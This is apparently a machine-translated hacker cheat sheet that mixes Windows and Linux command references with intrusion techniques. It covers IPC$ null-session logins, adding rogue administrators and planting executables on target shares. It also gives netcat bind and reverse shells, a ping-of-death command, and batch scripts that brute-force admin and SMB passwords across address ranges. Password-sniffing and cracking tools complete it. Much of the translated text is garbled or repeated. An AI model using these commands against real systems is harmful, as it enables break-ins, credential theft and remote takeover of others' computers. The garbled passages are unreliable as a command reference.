About CMD application

net use \\\ip\ipc$ " " /user:" " Create IPC null link

net use \\\ip\ipc$ "password" /user: "username" Create IPC non-null link

net use h: \\\ip\ipc$ "password" /user: "username" Maps the other C after logging in directly: to local as H:

net use h: \\ip\c$ login to map the other C: to local as H:

net use \\ip\ipc$ /del delete IPC link

net use h: /del delete mapping the other to local as H:

net user username password /add Creates a user

net user guest /active:yes Activates the guest user

net user Checks what users are available

net user Account name Checks account attributes

net localgroup administrators username /add Puts the "user" in the "user" field

net localgroup administrators username /add Predicts the "user" field. add Add the "user" to the administrator so that it has administrator privileges, note: administrator s plural

net start to see what services are turned on

net start service name to start the service; (such as: net start telnet, net start schedule)

net stop service name to stop a service

net time \\\ target ip to see the other side of the time

net time \\\ target ip /set set the local computer time and the "target IP" host time synchronization

net time \\\ target ip /set "host time synchronization, plus the parameter /yes can cancel the confirmation message

net view View what **** enjoy the local LAN

net view \\\ip View what **** enjoy the other LAN

net config Show system network settings

net logoff Disconnect the system from the network.

net logoff Disconnect a ****enjoyment

net pause Service name Suspend a service

net send ip "text message" Send a message to the other party

net ver Type of network connection and information about the network connection in use on the LAN

net share View locally turned on ****enjoyments <

net share ipc$ Enable ipc$***

net share ipc$ /del Delete ipc$***

net share c$ /del Delete C:****

net user guest 12345 Log in as guest and change the password to 12345. Change the password to 12345 after logging in as guest

net password Password Change the system login password

netstat -a See what ports are open, commonly used netstat -an

netstat -n See network connectivity on ports, commonly used netstat -an

netstat -v See what work is being done

net share c$ /del Delete the C*** share

net share c$ /del View what is being done

netstat -p protocol name Example: netstat -p tcq/ip View the use of a certain protocol (to view the use of the tcp/ip protocol)

netstat -s View the use of all protocols in use

nbtstat -A ip The other side of the 136 to 139 of them. If one of the ports is open, you can see the username of the other party's most recent login (the one before 03 is the username) - note: the parameter -A should be capitalized

tracert - parameter ip (or computer name) Trace the route (packet), the parameter: "-w digits" is used to set the timeout interval.

ping ip(or domain name) Send data to the other host with a default size of 32 bytes, parameters: "-l [space] packet size"; "-n number of times to send data"; "-t "means always ping.

ping -t -l 65550 ip ping of death (sending a file larger than 64K and pinging it all the time is ping of death)

ipconfig (winipcfg) is used in windows NT and XP (windows 95 98) to view the local ip address. ) to see the local ip address, ipconfig can be used with the parameter "/all" to display all the configuration information

tlist -t to display the process in a tree line list (for the system's additional tools, the default is not installed, in the installation directory of the Support/tools folder)

kill -F to process the process, the process is not installed, the process is not installed, the process is not installed, the process is not installed.

kill -F process name plus -F parameter to force the end of a process (for the system's additional tools, the default is not installed, in the installation directory of the Support/tools folder)

del -F filename plus -F parameter to delete read-only files, /AR, /AH, /AS, /AA, respectively, means to delete the read-only, hidden, system, archives, /A-R, /AA, /AH, /AA, /AA, /AA, /AA, /A-R, /AA, /AA, /AA, /AA, /AA, /AA. files, /AR, /AH, /AS, /AA means delete read-only, hidden, system, archive files, /A-R, /A-H, /A-S, /A-A means delete files other than read-only, hidden, system, archive. For example, "DEL/AR *. *" means delete all read-only files in the current directory, "DEL/A-S *. *" means delete all files except system files in the current directory

#2 Two:

del /S /Q directory or use: rmdir /s /Q directory /S to delete the directory and all subdirectories and files under the directory. At the same time, you can use the parameter /Q to cancel the system confirmation of the deletion operation and delete them directly. (Both commands work the same way.)

move disk \ path \ to move the file name of the path to store the moved file \ after the move file name to move the file, with the parameter / y will cancel the confirmation of moving the directory to confirm the existence of the same file prompt will be directly overwritten

fc one.txt two.txt > 3st.txt Compare and contrast the two files and put the differences to the 3st.txt output. The ">" and "> >" commands are redirection commands

at id number Starts a registered scheduled task

at /delete Stops all scheduled tasks; /yes stops all scheduled tasks without confirmation

at id number /delete Stops a registered scheduled task

at id number

at id number /delete Stops a registered scheduled task

at id number /delete

at View all scheduled tasks

at \\ip time program name (or a command) /r at a certain time to run the other side of a program and restart the computer

finger username @host to see what users recently logged in

telnet ip port far and logged in to the server, the default port is 23

open ip to connect to the IP (is the telnet login after the command)

telnet in the local machine directly into telnet will enter the local telnet

copy path \ filename 1 path \ filename 2 /y copy file 1 to the specified directory for the file 2, with the parameter / / y at the same time to cancel the confirmation of you want to change the file. y will also unconfirm that you want to rewrite an existing directory file

copy c:\srv.exe \\\ip\admin$ Copy the local c:\srv.exe to the other side of the admin under the

cppy 1st.jpg/b+2st.txt/a 3st.jpg Hide the contents of the 2nd .jpg into the 1st . .jpg to generate 3st.jpg new file, note: 2st.txt file header should be empty three rows, parameters: /b refers to the binary file, /a refers to the ASCLL format file

copy \\ip\admin$\svv.exe c:\ or:copy\\ip\admin$\*. * copy each other admini$*** enjoy under the srv.exe file (all files) to the local C:

xcopy To copy the file or directory tree Destination address \ directory name To copy the file and directory tree, with the parameter /Y will not be prompted to overwrite the same file

tftp -i their own IP (when using the meat machine as a jump-off point this is the use of the IP of the meat machine) get server.exe c:\server.exe After logging in, download the "IP" server.exe to the target host c:\server.exe Parameters: -i refers to the binary mode of transmission, such as the transmission of exe files, such as the transfer of ASCII mode (transmission of text files mode), such as the absence of -i transfer.

tftp -i Other IP put c:\server.exe After logging in, upload local c:\server.exe to the host

ftp ip port Used for uploading files to the server or performing file operations, the default port is 21. bin refers to binary transmission (executable file into); The default is ASCII format (for text files)

route print displays the IP route, which will mainly show the network address Network addres, subnet mask Netmask, gateway address Gateway addres, interface address Interface

arp Viewing and processing the ARP cache. ARP is the name resolution, responsible for resolving an IP into a physical MAC address. arp -a will show the full information

start Program name or command /max or /min Open a new window and maximize (minimize) a program or command

mem View cpu usage

To view the cpu usage, you must use the following command attrib filename (directory name) View attributes of a file (directory)

attrib filename -A -R -S -H or +A +R +S +H Removes (adds) archive, read-only, system, and hidden attributes of a file; + is added as an attribute

dir View a file, with the following parameters: /Q shows to which user the file and directory belongs to the system; /T :C shows when the file was created, /T:A shows when the file was last accessed, /T:W last modified

date /t, time /t Using this parameter, i.e., "DATE/T", "TIME/T", will only show the current date and time. show only the current date and time without having to enter a new date and time

set Specify environment variable name = character to assign to the variable Set environment variables

set show all current environment variables

set p (or other character) show all current environment variables starting with the character p (or other character)

pause pauses the batch program and stops it from running. pause Pauses the batch program and displays: Please press any key to continue ....

if Performs conditional processing in a batch program (see if commands and variables for more information)

goto tag Directs cmd.exe to the line with the tag in the batch program (the tag must be on a separate line and begin with a colon, e.g., the ":start" tag)

call path\batch filename Calls another batch program from a batch program (see call /? for more information).

for Executes a specific command for each file in a group (see for commands and variables for more information)

echo on or off Turns echo on or off; use echo alone without arguments to display the current echo settings

echo message Displays a message on the screen

echo message & gt; > pass gt;> pass.txt Saves the "message" to the pass.txt file

findstr "Hello" aa.txt Looks for the string hello in the aa.txt file

find filename Looks for a file

title Title name Changes the title name of the CMD window

color Color value.

color color value Sets the foreground and background color of the cmd console; 0=black, 1=blue, 2=green, 3=light green, 4=red, 5=purple, 6=yellow, 7=white, 8=gray, 9=pale blue, A=pale green, B=pale light green, C=pale red, D=pale violet, E=pale yellow, F=bright white

prompt name Changes the command prompt that is displayed by cmd.exe. Command Prompt (change C:\, D:\ uniformly to: EntSky\ )

#3 Three:

ver Display version information in a DOS window

winver Bring up a window to display version information (memory size, system version, patch version, computer name)

format Disk /FS:Type Format the disk, type: FAT, FAT32, NTFS , example: Format D: /FS:NTFS

md directory name Create a directory

replace source file Directory where the file is to be replaced Replace the file

ren original filename new filename Rename the filename

tree displays the directory in a tree structure. directory, the -f parameter lists the names of files in the first folder

type filename Displays the contents of a text file

more filename Displays the output file screen-by-screen

doskey Command to lock = Character

doskey Command to unlock = Lock command for DOS (edits the command line, recalls the win2k commands, and create macros). E.g., lock dir command: doskey dir=entsky (you can't use doskey dir=dir); unlock: doskey dir=

taskmgr Calls up Task Manager

chkdsk /F D: Checks disk D and displays a status report; adds the parameter /f and fixes errors on the disk

tlntadmn telnt service admn, type tlntadmn select 3, then select 8, you can change the telnet service default port 23 to any other port

exit Exit the cmd.exe program or the current one, with the parameter /B it is to exit the current batch script instead of cmd.exe

path path \ The filename of the executable file Set a path to the executable file.

cmd Launches a win2K command interpretation window. Parameters: /eff, /en disable, enable command expansion; see cmd /?

regedit /s registry filename Import the registry; parameter /S refers to quiet mode import without any prompts;

regedit /e registry filename Export the registry

cacls filename Parameters Display or modify file access control lists (ACLs) - - For NTFS format. -For NTFS format. Parameters: /D username:set deny access to a user; /P username:perm replace access rights for a specified user; /G username:perm give access rights to a specified user; Perm can be: N None, R Read, W Write, C Change (Write), F Full Control; Example: cacls D:\test.txt /D pub set d:\test. txt to deny access to pub users.

cacls filename View a list of user permissions to access the file

REM text content Add a comment to the batch file

netsh View or change the local network configuration

#4 IV:

IIS service commands:

iisreset /reboot Restart the Win2k computer (but a message indicating that the system will reboot appears)

iisreset /start or stop Starts (stops) all Internet services

iisreset /restart Stops and then restarts all Internet services

iisreset / status Displays the status of all Internet services

iisreset /enable or disable Enables (disables) the restart of Internet services on the local system

iisreset /rebootonerror Enables (disables) the restart of Internet services on the local system

iisreset /rebootonerror Reboots the system if an error occurs when starting, stopping, or restarting Internet services.

iisreset /noforce Val will not force the Internet service to terminate if it cannot be stopped

iisreset /timeout Val does not stop the Internet service when it reaches the timeout parameter (in seconds), if you specify /rebootonerror. rebootonerror parameter, the computer will reboot. The default values are 20 seconds for restart, 60 seconds for stop, and 0 seconds for reboot.

FTP commands: (detailed descriptions follow)

The command line format for ftp is:

ftp -v -d -i -n -g[hostname]. -v Displays all response messages from the remote server.

-d Use the debugging method.

-n Restricts ftp to automatic login, i.e., does not use .netrc files.

-g Cancel global filenames.

help [command] or ? [command] View command description

bye or quit Terminates the host FTP process and exits the FTP management mode.

pwd Lists the current remote host directory

put or send local-filename [filename uploaded to host] Transfers a local file to a remote host

get or recv [remote-host-filename] [filename downloaded locally] Transfers a file from a remote host to the local host

mget [ remote-files] Transfers a file from a remote host to the local host. remote-files] Receives a batch of files from the remote host to the local host

mput local-files Transfers a batch of files from the local host to the remote host

dir or ls [remote-directory] [local-file] Lists the files in the directory of the current remote host. If there is a local file, the result is written to the local file

ascii Sets the file to be transferred in ASCII (default)

bin or image Sets the file to be transferred in binary

bell Alarms for each file transfer

cdup Returns to the previous directory

close Interrupts ftp transfer with the remote server. close Interrupts ftp session with remote server (corresponds to open)

open host[port] Establishes a connection to the specified ftp server, can specify the port to connect to

delete Deletes files from the remote host

mdelete [remote-files] Deletes a batch of files

mkdir directory-name Creates a directory in the remote host

rename [from] [to] Changes the filename in the remote host

rmdir directory-name Deletes a directory in the remote host

status Displays the current status of FTP

< p>system Displays the remote host system type

user user-name [password] [account] Re-login to the remote host with a different username

open host [port] Re-establish a new connection

prompt Interactive Prompt Mode

macdef Defines macro commands

lcd Changes the working directory of the current local host; by default, it goes to the current user's HOME directory

chmod Changes file permissions on the remote host

case When ON, filenames copied to the local machine with the MGET command are converted to lowercase letters

cd remote-dir into the remote host directory

cdup into the parent directory of the remote host directory

! Execute the interactive shell in the local machine, exit back to the ftp environment, such as !ls*.zip

#5 V:

MYSQL commands:

mysql -h host address -u username -p password Connecting to MYSQL; if MYSQL has just been installed, the superuser root is not have a password.

(Example: mysql -h110.110.110.110 -Uroot -P123456

Note: u and root can be used without spaces, and the rest is the same)

exit Exit MYSQL

mysqladmin -u username -p old password password new password change password

grant select on database. * to username@login host identified by \"password\"; Add new user. (Note: Unlike the above, the following are followed by a semicolon as a command terminator because they are commands in a MYSQL environment.)

show databases; Displays a list of databases. There are only two databases at the beginning: mysql and test. the mysql library is very important because it contains system information about MYSQL, and it's what we use to change passwords and add new users.

use mysql;

show tables; displays the tables in the library

describe table name; displays the structure of the table

create database; builds the database

use library name;

create table table name (list of fields); builds the table

create table; create a table. set list); create table

drop database library;

drop table table; delete database and table

delete from table; empty table rows

select * from table; show table rows

mysqldump --opt school>school.bbb Backup database: (command executed in DOS \\\ mysql\\\bin directory) ;Note: Backup database school to school.bbb file, school.bbb is a text file, the file name is optional, open to see you will have a new discovery.

New commands for Win2003 (practical part):

shutdown /parameters Shutdown or reboot the local or remote host.

Parameter description: /S shutdown host, /R reboot host, /T number Set the delay time, the range of 0 to 180 seconds, /A cancel boot, /M //IP specified remote host.

Example: shutdown /r /t 0 Immediately reboots the local host (no delay)

taskill /parameters Process name or process pid Terminates one or more tasks and processes.

Parameter description: /PID The pid of the process to be terminated, use the tasklist command to get the pid of each process, /IM The process name of the process to be terminated, /F To force the termination of the process, /T To terminate the specified process and the subprocesses he started.

tasklist displays the process identifiers (PIDs) of the processes, services, and services each currently running on the local and remote hosts.

Parameter description: /M lists the dll files loaded by the current process, /SVC shows the services corresponding to each process, without parameters, only the current process is listed

#6 Six:

Linux basic commands: to be case sensitive

uname show the version of the information (the same as the ver of the Win2K)

dir show the current directory.

dir displays files in the current directory, and ls -al displays files including hidden ones (the same as Win2K's dir)

pwd queries the current directory location

cd cd . Return to the previous directory, note the space between cd and .... Note the space between cd and .... cd / returns to the root directory.

cat filename View the contents of the file

cat >abc.txt Write the contents of abc.txt.

more filename Display a text file in a page-by-page format.

cp copy a file

mv move a file

rm filename deletes a file, rm -a directory name deletes a directory and subdirectories

mkdir directory name creates a directory

rmdir deletes a subdirectory, with no documents in the directory.

chmod Sets access permissions to a file or directory

grep Finds strings in a file

diff Compares files in a file

find Searches in a file

date Current date and time

who Finds out who is currently working on the same machine as you are, and when and where they were logged in. Location

w Find out the details of the person currently on the machine

whoami See your account name

groups See someone's Groups

passwd Change password

history See the commands you've given

ps Show the status of a process

kill Stop a process

gcc Hackers usually use it to compile files written in C

su Privilege switch to the specified user

telnet IP telnet connection to each other's hosts (the same as Win2K), when the bash$ appears, it means that the connection is successful.

ftp ftp connect to a server (same as Win2K)

Attachment: batch commands and variables

1: for commands and variables Basic format:

FOR /parameters %variable IN (set) DO command [command_parameters] %variable:Specify a parameter to be used as a parameter. variable:Specify a single letter replaceable parameter, e.g., %i , and to specify a variable use: %%i , and to call the variable use: %i% , variables are case sensitive (%i is not equal to %I).

The batch can handle variables from %0-%9***10 each time, of which %0 defaults to the batch file name, %1 defaults to the first value entered when using this batch, and similarly: %2-%9 refers to the input of the 2nd-9th value; Example: net use \\ip\ipc$ pass /user:user in ip for %1,pass for %2 ,user for %3

(set):Specify a file or a group of files, you can use wildcards, such as: (D:\user.txt) and (1 1 254)(1 -1 254),{ "(1 1 254) "The first "1" refers to the starting value, the second "1" refers to the amount of growth, the third "254" refers to the end of the value, that is: from 1 to 254; "(1 -1 254)" Description: that is, from 254 to 1 }

command: Specify the command to be executed on the first file, such as: net use command. For example: net use command; if you want to execute more than one command, add: & to separate the commands

command_parameters: specify parameters or command line switches for a particular command

IN (set): means to take the value in (set); DO command: means to execute the command

Parameters: /L means to use incremental form { (set) is incremental form }; /F means to keep taking values from the file until it is finished { (set) is a file, such as (d:\pass.txt) }.

Use examples:

@echo off

echo Usage format: test.bat *. *. * > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator | find "Command completed successfully" >>test. txt

Save as test.bat Description: Try to establish an IPC$ connection with an empty administrator password for the 254 IPs of a specified Class C segment in turn, and if successful, save the IP in test.txt.

/L means in incremental form (i.e., from 1-254 or 254-1); the first three digits of the input IP: *. *. * is the batch default %1; %%G is a variable (the last bit of the ip); & is used to separate the two commands echo and net use; | refers to the creation of ipc$, in the results of the find to see whether there is a "successful completion of the command" message; %1.%%G is the full IP address; (1 1 254) refers to the starting value, the growth of the amount of the end of the value.

@echo off

echo Format: ok.bat ip

FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200

Saved as: ok.exe Explanation: After inputting an IP address, use the dictionary file d:\pass.dic to enter an IP address. :\pass.dic to storm the user password in d:\user.dic until the value in the file is taken. %%i is the user name; %1 is the IP address entered (default).

#7 VII:

2: If Commands and Variables Basic Format:

IF [not] errorlevel number Command Statement If the program returns an exit code equal to or greater than the specified number at the end of the program run, the specified condition is "true".

Example: IF errorlevel 0 The IF errorlevel 0 command means that if the value returned by the program execution is 0, the command after the value line; IF not errorlevel 1 The IF not errorlevel 1 command means that if the value returned at the end of the program execution is not equal to 1, the command after the program execution will be executed.

0 means found and successfully executed (true); 1 means not found, not executed (false).

IF [not] String 1 == String 2 Command Statement If the specified text strings match (that is, String 1 is equal to String 2), executes the command that follows.

Example: "if "%2%"=="4" goto start" means: if the second variable is 4, execute the following commands (note: call the variable with %variable name% and add " ")

IF [not] exist filename Command Statement If the file name exists, execute the following commands. filename exists, execute the command that follows.

Example: "if not nc.exe goto end" means: if no nc.exe file is found, jump to the ":end" tag.

IF [not] errorlevel number command statement else command statement or IF [not] string1==string2 command statement else command statement or IF [not] exist filename command statement else command statement Plus: the else command statement means: when the previous condition does not hold, the command after the else command. command. Note: else must be on the same line as if to be valid. When there is a del command, you need to use < > to enclose all the contents of the del command, because the del command can only be executed on a separate line, with < > after the line is a separate line; for example: "if exist test.txt. < del test.txt.> else echo test.txt.missing", note the "." in the command

(ii) system external commands (all need to download the relevant tools):

1, Swiss Army Knife: nc.exe

Parameter description:

-h View help information

-d background mode

-e prog program redirection, once connected to the execution of the [dangerous]

-i secs Delayed intervals

-l Listening mode, for inbound connections

-L Listening mode, continues to listen even after the connection is sky closed, until CTR+C

-n IP addresses, not domain names

-o film logs hexadecimal transmissions

-p [space] ports Local port numbers

-r random Local and remote ports

-t Use Telnet interaction

-u UDP mode

-v Detailed output, use -vv for more detail

-w Numeric timeout delay intervals

-z Turns input, output off (for sweeping anchors)

Basic usage:

nc -nvv 192.168.0.1 80 Connects to port 80 on host 192.168.0.1

nc -l -p 80 Opens local TCP port 80 and listens

nc -nvv -w2 -z 192.168.0.1 80-1024 Sweeps ports 80-1024 on anchor 192.168.0.1 < /p>

nc -l -p 5354 -t -e c:winntsystem32cmd.exe Bind remote host's cmdshell to remote's TCP port 5354

nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 bang on cmdshell of the remote host and reverse the connection to port 5354 of 192.168.0.2

Advanced Usage:

nc -L -p 80 as a honeypot 1: Enable and keep listening on port 80 until CTR+C

nc -L -p 80 > c:\log.txt as a honeypot 2: Open and keep listening on port 80 until CTR+C, and output the result to c:\log.txt

nc -L -p 80 < c:\honeyport.txt as a honeypot 3-1: Open and keep listening on port 80 until CTR+C, and send the contents of c:\honeyport.txt into the The pipe can also be used to transfer files

type.exe c:\honeyport | nc -L -p 80 as a honeypot 3-2: open and listen to port 80 until CTR+C, and send the contents of c:\honeyport.txt into the pipe, can also be used to transfer files

Local machine with: nc -l -p local port

On the other side of the host: nc -e cmd.exe local IP -p local port *win2K

nc -e /bin/sh local IP -p local port *linux,unix reverse connection to break through the other side of the host's firewall

On the local side of the use of: nc -d -l -p local port & lt; Path and name of the file to be transferred

On the other host: nc -vv Local IP Local port > Path and name of the file to be stored Transferring a file to the other host

Remarks:

| Pipeline commands

< or > Redirection commands. "<", for example: tlntadmn < test.txt means to assign the contents of test.txt to the tlntadmn command

＠ means to execute the command after @, but it will not be displayed (executed in the background); example: @dir c:\winnt > ;> d:\log.txt Meaning: execute dir in the background and store the result in d:\log.txt

> > vs > > Difference between ">" and ">" means: overwrite; and "> >" means: save to (add to).

such as: @dir c:\winnt >> d:\log.txt and @dir c:\winnt > d:\log.txt two commands were executed twice to compare the look: with the >> of the results of the second is to save the results of the second time, and with the: > there is only one time the result is because of the second results to the the first one is overwritten.

#8 Eight:

2, anchor scanning tool: xscan.exe

Basic Format

xscan -host <Start IP>[-<End IP>] <Detection Items> [Other Options] Sweeps all hosts of the "Start IP to End IP" segment of the anchor

xscan.exe is a tool that allows you to scan all hosts of the "Start IP to End IP" segment. p>

xscan -file <Host list filename> <Detect item> [Other options] Scans all hosts in the "Host IP list filename" segment

Detect item

-active Detects if the host is alive

-os Detects the type of remote OS (via NETBIOS and SNMP protocols)

-port Detects port status of common services

-ftp Detects FTP weak password

-pub Detects anonymous user write access to FTP service

-pop3 Detects POP3-Server weak password

-smtp Detects SMTP-Server vulnerability

-smtp detects SMTP Server vulnerability

-sql Detects weak SQL-Server password

-smb Detects weak NT-Server password

-iis Detects IIS encoding/decoding vulnerability

-cgi Detects CGI vulnerability

-nasl Loads Nessus attack scripts

-all Detect all of the above

Other Options

-i Adapter Number Sets the network adapter, <adapter-number> can be obtained with the "-l" parameter

-l Displays all the network adapters

-v Shows the progress of the scanning in detail

-p Skips hosts that do not respond

-o Skips hosts that do not detect open vulnerabilities

-t Number of concurrent threads, number of concurrent hosts Specifies the maximum number of concurrent threads and concurrent hosts, defaults to 100,10

-log Filename Specifies the scan report filename (suffix: TXT or HTML format file)

Usage Examples

xscan -host 192.168.1.1-192.168.255.255 -all -active -p Detects all vulnerabilities on hosts in the 192.168.1.1-192.168.255.255 segment, skipping unresponsive hosts

xscan -host 192.168.1.1- 192.168.255.255 -port -smb -t 150 -o Detects the standard port status of hosts in the 192.168.1.1-192.168.255.255 segment, NT weak password users, maximum number of concurrent threads is 150, skips hosts with no open ports detected

xscan -file hostlist.txt -port -cgi -t 200,5 -v -o Detect the standard port status of all hosts listed in the "hostlist.txt" file, CGI vulnerability, the maximum number of concurrent threads is 200, at the same time up to 5 hosts, display detailed detection progress udp Outputs UDP datagrams

-icmp Outputs ICMP datagrams

-pass Filters password information

-hide Runs in the background

-host Resolves the hostname

-addr IP address Filters IP addresses

-port Port Filters the ports

-log filename Saves output to file

-asc Outputs in ASCII

-hex Outputs in hexadecimal

Usage Examples

xsniff.exe -pass -hide -log pass.log Runs in background to sniff passwords and saves them in the pass.log file. log file

xsniff.exe -tcp -udp -asc -addr 192.168.1.1 Sniffs 192.168.1.1 and filters tcp and udp information and outputs it in ASCII format

4. Terminal Services Password Cracking: tscrack.exe

Parameter Description

-h Display help

-v Display version information

-s Type decryption capability on screen

-b Sound when password is wrong

-t Same as sending multiple connections (multiple

)